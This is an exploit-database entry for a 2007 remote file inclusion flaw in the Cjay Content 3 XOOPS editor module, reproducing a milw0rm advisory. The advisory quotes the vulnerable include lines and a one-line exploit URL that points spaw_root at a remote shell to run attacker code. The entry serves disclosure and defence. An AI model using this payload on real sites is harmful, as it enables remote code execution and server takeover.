header-logo
Suggest Exploit
vendor:
Cjay Content 3
by:
FiSh
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Cjay Content 3
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Cjay Content 3 WYSIWYG IE 5.5+ Remote File Inclusion Vulnerability

The vulnerability exists in the /admin/editor2/spaw_control.class.php file. By exploiting this vulnerability, an attacker can include arbitrary files from remote servers into the vulnerable application, potentially leading to remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the software or apply any available security patches. Additionally, enabling strict input validation and disabling the use of remote file inclusion can help prevent exploitation.
Source

Exploit-DB raw data:

##############################################################################################
#         ___   ___                         _
#        / _ \ / _ \                       | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
#   __/ |
#  |___/
##############################################################################################
#INFO:
#Program Title ###############################################################################
#Cjay Content 3 WYSIWYG IE 5.5+ Remote File Inclusion Vulnerability
#
#Description #################################################################################
#Editor module for XOOPS CMS
#
#Vuln Code ###################################################################################
#In /admin/editor2/spaw_control.class.php:
# include $spaw_root.'config/spaw_control.config.php';
# include $spaw_root.'class/toolbars.class.php';
# include $spaw_root.'class/lang.class.php';
#Note: Register globals must be ON, and Magic Quotes must be OFF for this exploit to work.
#
#Script Download ##############################################################################
#http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1123
#
#Exploit ######################################################################################
#
#http://[ site ]/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[ shell ]?
#
#Credits ######################################################################################
#FiSh for vulnerability
#shoutz: clorox, z3r0, katalyst, SyNiCaL, sCuZz, OD, pr0be, 0ptix, str0ke
#        grumpy, and everyone else at g00ns.net
###############################################################################################

# milw0rm.com [2007-06-13]